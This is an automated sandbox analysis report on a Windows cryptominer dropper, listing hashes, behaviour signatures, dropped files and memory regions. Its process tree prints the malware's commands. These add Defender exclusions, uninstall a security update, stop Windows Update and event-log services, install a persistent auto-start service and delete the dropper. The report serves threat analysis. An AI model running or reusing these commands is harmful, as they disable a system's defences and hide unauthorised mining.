Analysis

  • max time kernel
    9s
  • max time network
    73s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22/03/2024, 12:37

General

  • Target

    4e5fcc788287580ed19402eadaab8c69ca5f0a904ead605153feb534bbe87002.exe

  • Size

    5.3MB

  • MD5

    b59631e064541c8651576128708e50f9

  • SHA1

    7aae996d4990f37a48288fa5f15a7889c3ff49b3

  • SHA256

    4e5fcc788287580ed19402eadaab8c69ca5f0a904ead605153feb534bbe87002

  • SHA512

    571a06f0ec88fe3697388195dd0a7f7e8d63945748855d928fb5005b51fd2c2baea1a63bd871ed0cfade5eabb879f577b7b04f9cd4d1222de52da641feee1f92

  • SSDEEP

    98304:69w8PMOW9ZI6aO7sd/mzt5mAiN1vw+/YR8ov/bkMJmJZNOnTdjyip:ndIV0G/mzsN1vl/YRV4MY9OnTdjy

Score
8/10

Malware Config

Signatures

  • Creates new service(s) 1 TTPs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Launches sc.exe 9 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4e5fcc788287580ed19402eadaab8c69ca5f0a904ead605153feb534bbe87002.exe
    "C:\Users\Admin\AppData\Local\Temp\4e5fcc788287580ed19402eadaab8c69ca5f0a904ead605153feb534bbe87002.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAcQBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAZwBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAaABlACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2104
    • C:\Users\Admin\AppData\Roaming\Miner.exe
      "C:\Users\Admin\AppData\Roaming\Miner.exe"
      2⤵
      • Executes dropped EXE
      PID:4784
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
          PID:4600
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          3⤵
            PID:948
            • C:\Windows\system32\wusa.exe
              wusa /uninstall /kb:890830 /quiet /norestart
              4⤵
                PID:5064
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop UsoSvc
              3⤵
              • Launches sc.exe
              PID:3808
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop WaaSMedicSvc
              3⤵
              • Launches sc.exe
              PID:1408
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop wuauserv
              3⤵
              • Launches sc.exe
              PID:572
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop bits
              3⤵
              • Launches sc.exe
              PID:4644
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop dosvc
              3⤵
              • Launches sc.exe
              PID:5056
            • C:\Windows\system32\dialer.exe
              C:\Windows\system32\dialer.exe
              3⤵
                PID:3228
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe delete "RYVSUJUA"
                3⤵
                • Launches sc.exe
                PID:3964
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe create "RYVSUJUA" binpath= "C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe" start= "auto"
                3⤵
                • Launches sc.exe
                PID:1572
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop eventlog
                3⤵
                • Launches sc.exe
                PID:1872
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe start "RYVSUJUA"
                3⤵
                • Launches sc.exe
                PID:1460
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Miner.exe"
                3⤵
                  PID:2524
                  • C:\Windows\system32\choice.exe
                    choice /C Y /N /D Y /T 3
                    4⤵
                      PID:3132
                • C:\Users\Admin\AppData\Roaming\Shortcutter.exe
                  "C:\Users\Admin\AppData\Roaming\Shortcutter.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:236
              • C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
                C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
                1⤵
                  PID:4824
                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    2⤵
                      PID:2032

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    18KB

                    MD5

                    d7293c9ef5fbab0329ae8ccb2a7d8031

                    SHA1

                    18b48cbccf5eb63de7c20b3a4624fdc90c52b06f

                    SHA256

                    a546a0029d26f7398ea4f9130a1b509f80247b8122338c0e7ef7112e9f8f38a7

                    SHA512

                    3c3d42fdce99fea9b8165c27a6337d0997334bc528052bf5830477a0808053b09a82886a04ef9fe8e3b75de17830d0b95e7efbdbdf9f7c60b8b3df5ba11d9e64

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4l0tosi.h4c.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Roaming\Miner.exe

                    Filesize

                    5.3MB

                    MD5

                    99201be105bf0a4b25d9c5113da723fb

                    SHA1

                    443e6e285063f67cb46676b3951733592d569a7c

                    SHA256

                    e4eda2de1dab7a3891b0ed6eff0ccd905ff4b275150004c6eb5f1d6582eea9a2

                    SHA512

                    b57ae7282f2798cbf231f8ca6081b5fab10068566a49f0ad735e8408ccd73d77efb5c26a48b7591e20711f0adbd9e619b40078b9c51d31b7a9768104529e7808

                  • C:\Users\Admin\AppData\Roaming\Miner.exe

                    Filesize

                    1.2MB

                    MD5

                    a9e98142d0e5801845155b3b6afd49a5

                    SHA1

                    1059ed356497a453b7885d5fb74fcfe57423f592

                    SHA256

                    84561b32a5d8ffe61f1f16552192b6cef6c5df0c75d5e6545a9bea1f3d4334c3

                    SHA512

                    e6c07fe18a92fc5d3813e98027db3fb87a52a070512d16dd4979e9fcb810320bc3355fc8152183d4e7c1be305d5ce30ef3fa2ab1638b16e48cd424cfbe56e2a7

                  • C:\Users\Admin\AppData\Roaming\Shortcutter.exe

                    Filesize

                    50KB

                    MD5

                    4ce8fc5016e97f84dadaf983cca845f2

                    SHA1

                    0d6fb5a16442cf393d5658a9f40d2501d8fd725c

                    SHA256

                    f4da7f22e8eb28cfd8ecb0c3fdc8923b2ba5c5e96b917cbcf53b6bbed1c22551

                    SHA512

                    4adeb4774ca136a085bc92cf6f02aa340f927ae12e1db90e8a2be69ef045611d333904ef5714c876ab03f8bcc52ee0140e724bd1659b9cf9eacf0a7d6a7bdd46

                  • memory/236-102-0x00000221AF450000-0x00000221AF460000-memory.dmp

                    Filesize

                    64KB

                  • memory/236-23-0x0000022194CE0000-0x0000022194CF2000-memory.dmp

                    Filesize

                    72KB

                  • memory/236-94-0x00007FFEBFBB0000-0x00007FFEC0672000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/236-22-0x00007FFEBFBB0000-0x00007FFEC0672000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/408-143-0x000002E842570000-0x000002E84259B000-memory.dmp

                    Filesize

                    172KB

                  • memory/408-151-0x000002E842570000-0x000002E84259B000-memory.dmp

                    Filesize

                    172KB

                  • memory/408-147-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/436-127-0x000001A6AA580000-0x000001A6AA5AB000-memory.dmp

                    Filesize

                    172KB

                  • memory/436-114-0x000001A6AA580000-0x000001A6AA5AB000-memory.dmp

                    Filesize

                    172KB

                  • memory/436-118-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/468-122-0x000001FBB41A0000-0x000001FBB41CB000-memory.dmp

                    Filesize

                    172KB

                  • memory/468-129-0x000001FBB41A0000-0x000001FBB41CB000-memory.dmp

                    Filesize

                    172KB

                  • memory/468-124-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/644-116-0x00007FFEE1586000-0x00007FFEE1587000-memory.dmp

                    Filesize

                    4KB

                  • memory/644-111-0x00007FFEE1584000-0x00007FFEE1585000-memory.dmp

                    Filesize

                    4KB

                  • memory/644-119-0x00007FFEE1583000-0x00007FFEE1584000-memory.dmp

                    Filesize

                    4KB

                  • memory/644-99-0x000001B99BB30000-0x000001B99BB5B000-memory.dmp

                    Filesize

                    172KB

                  • memory/644-101-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/644-98-0x000001B99BB00000-0x000001B99BB24000-memory.dmp

                    Filesize

                    144KB

                  • memory/644-108-0x000001B99BB30000-0x000001B99BB5B000-memory.dmp

                    Filesize

                    172KB

                  • memory/692-105-0x000002BADAF90000-0x000002BADAFBB000-memory.dmp

                    Filesize

                    172KB

                  • memory/692-109-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/692-123-0x000002BADAF90000-0x000002BADAFBB000-memory.dmp

                    Filesize

                    172KB

                  • memory/996-125-0x000002DEB26B0000-0x000002DEB26DB000-memory.dmp

                    Filesize

                    172KB

                  • memory/996-113-0x000002DEB26B0000-0x000002DEB26DB000-memory.dmp

                    Filesize

                    172KB

                  • memory/996-117-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/1016-140-0x00000268690F0000-0x000002686911B000-memory.dmp

                    Filesize

                    172KB

                  • memory/1016-144-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/1016-146-0x00000268690F0000-0x000002686911B000-memory.dmp

                    Filesize

                    172KB

                  • memory/1080-153-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/1080-149-0x0000013980BD0000-0x0000013980BFB000-memory.dmp

                    Filesize

                    172KB

                  • memory/1080-156-0x0000013980BD0000-0x0000013980BFB000-memory.dmp

                    Filesize

                    172KB

                  • memory/1124-154-0x000002711A980000-0x000002711A9AB000-memory.dmp

                    Filesize

                    172KB

                  • memory/1124-158-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/1124-160-0x000002711A980000-0x000002711A9AB000-memory.dmp

                    Filesize

                    172KB

                  • memory/1136-177-0x0000025649330000-0x000002564935B000-memory.dmp

                    Filesize

                    172KB

                  • memory/1136-162-0x0000025649330000-0x000002564935B000-memory.dmp

                    Filesize

                    172KB

                  • memory/1136-166-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/1180-167-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/1180-164-0x00000140FACF0000-0x00000140FAD1B000-memory.dmp

                    Filesize

                    172KB

                  • memory/1264-171-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/1264-169-0x000001F29F550000-0x000001F29F57B000-memory.dmp

                    Filesize

                    172KB

                  • memory/1292-174-0x000001FE65290000-0x000001FE652BB000-memory.dmp

                    Filesize

                    172KB

                  • memory/1292-176-0x00007FFEA1570000-0x00007FFEA1580000-memory.dmp

                    Filesize

                    64KB

                  • memory/1380-185-0x00000255C1370000-0x00000255C139B000-memory.dmp

                    Filesize

                    172KB

                  • memory/1520-188-0x00000212A01D0000-0x00000212A01FB000-memory.dmp

                    Filesize

                    172KB

                  • memory/1536-194-0x0000022DE7490000-0x0000022DE74BB000-memory.dmp

                    Filesize

                    172KB

                  • memory/1644-198-0x0000023286540000-0x000002328656B000-memory.dmp

                    Filesize

                    172KB

                  • memory/1676-203-0x00000142A46A0000-0x00000142A46CB000-memory.dmp

                    Filesize

                    172KB

                  • memory/1700-217-0x000001AFF4B20000-0x000001AFF4B4B000-memory.dmp

                    Filesize

                    172KB

                  • memory/2032-128-0x0000021170610000-0x0000021170620000-memory.dmp

                    Filesize

                    64KB

                  • memory/2032-179-0x0000021170610000-0x0000021170620000-memory.dmp

                    Filesize

                    64KB

                  • memory/2032-214-0x00007FFEBFBB0000-0x00007FFEC0672000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2032-142-0x00007FFEBFBB0000-0x00007FFEC0672000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/2104-38-0x00000000060D0000-0x00000000060EE000-memory.dmp

                    Filesize

                    120KB

                  • memory/2104-60-0x0000000007650000-0x000000000765E000-memory.dmp

                    Filesize

                    56KB

                  • memory/2104-44-0x0000000074420000-0x000000007446C000-memory.dmp

                    Filesize

                    304KB

                  • memory/2104-43-0x0000000007090000-0x00000000070C4000-memory.dmp

                    Filesize

                    208KB

                  • memory/2104-42-0x000000007F130000-0x000000007F140000-memory.dmp

                    Filesize

                    64KB

                  • memory/2104-54-0x00000000072D0000-0x0000000007374000-memory.dmp

                    Filesize

                    656KB

                  • memory/2104-41-0x0000000004D40000-0x0000000004D50000-memory.dmp

                    Filesize

                    64KB

                  • memory/2104-39-0x0000000006120000-0x000000000616C000-memory.dmp

                    Filesize

                    304KB

                  • memory/2104-66-0x0000000073A00000-0x00000000741B1000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/2104-37-0x0000000005C00000-0x0000000005F57000-memory.dmp

                    Filesize

                    3.3MB

                  • memory/2104-28-0x0000000005B90000-0x0000000005BF6000-memory.dmp

                    Filesize

                    408KB

                  • memory/2104-27-0x0000000005B20000-0x0000000005B86000-memory.dmp

                    Filesize

                    408KB

                  • memory/2104-55-0x0000000007A40000-0x00000000080BA000-memory.dmp

                    Filesize

                    6.5MB

                  • memory/2104-26-0x0000000005220000-0x0000000005242000-memory.dmp

                    Filesize

                    136KB

                  • memory/2104-25-0x0000000004D40000-0x0000000004D50000-memory.dmp

                    Filesize

                    64KB

                  • memory/2104-24-0x0000000004D40000-0x0000000004D50000-memory.dmp

                    Filesize

                    64KB

                  • memory/2104-56-0x0000000007400000-0x000000000741A000-memory.dmp

                    Filesize

                    104KB

                  • memory/2104-21-0x0000000005380000-0x00000000059AA000-memory.dmp

                    Filesize

                    6.2MB

                  • memory/2104-57-0x0000000007490000-0x000000000749A000-memory.dmp

                    Filesize

                    40KB

                  • memory/2104-58-0x0000000007690000-0x0000000007726000-memory.dmp

                    Filesize

                    600KB

                  • memory/2104-59-0x0000000007610000-0x0000000007621000-memory.dmp

                    Filesize

                    68KB

                  • memory/2104-53-0x00000000066B0000-0x00000000066CE000-memory.dmp

                    Filesize

                    120KB

                  • memory/2104-61-0x0000000007660000-0x0000000007675000-memory.dmp

                    Filesize

                    84KB

                  • memory/2104-5-0x0000000073A00000-0x00000000741B1000-memory.dmp

                    Filesize

                    7.7MB

                  • memory/2104-62-0x0000000007750000-0x000000000776A000-memory.dmp

                    Filesize

                    104KB

                  • memory/2104-6-0x0000000004C00000-0x0000000004C36000-memory.dmp

                    Filesize

                    216KB

                  • memory/2104-63-0x0000000007740000-0x0000000007748000-memory.dmp

                    Filesize

                    32KB

                  • memory/3228-90-0x00007FFEE14E0000-0x00007FFEE16E9000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/3228-84-0x0000000140000000-0x000000014002B000-memory.dmp

                    Filesize

                    172KB

                  • memory/3228-206-0x00007FFEE14E0000-0x00007FFEE16E9000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/3228-93-0x0000000140000000-0x000000014002B000-memory.dmp

                    Filesize

                    172KB

                  • memory/3228-89-0x0000000140000000-0x000000014002B000-memory.dmp

                    Filesize

                    172KB

                  • memory/3228-91-0x00007FFEDF7B0000-0x00007FFEDF86D000-memory.dmp

                    Filesize

                    756KB

                  • memory/3228-97-0x00007FFEE14E0000-0x00007FFEE16E9000-memory.dmp

                    Filesize

                    2.0MB

                  • memory/3228-87-0x0000000140000000-0x000000014002B000-memory.dmp

                    Filesize

                    172KB

                  • memory/3228-86-0x0000000140000000-0x000000014002B000-memory.dmp

                    Filesize

                    172KB

                  • memory/3228-85-0x0000000140000000-0x000000014002B000-memory.dmp

                    Filesize

                    172KB

                  • memory/4600-77-0x0000026628A90000-0x0000026628AA0000-memory.dmp

                    Filesize

                    64KB

                  • memory/4600-82-0x00007FFEBFBB0000-0x00007FFEC0672000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4600-72-0x0000026628A50000-0x0000026628A72000-memory.dmp

                    Filesize

                    136KB

                  • memory/4600-76-0x00007FFEBFBB0000-0x00007FFEC0672000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/4600-78-0x0000026628A90000-0x0000026628AA0000-memory.dmp

                    Filesize

                    64KB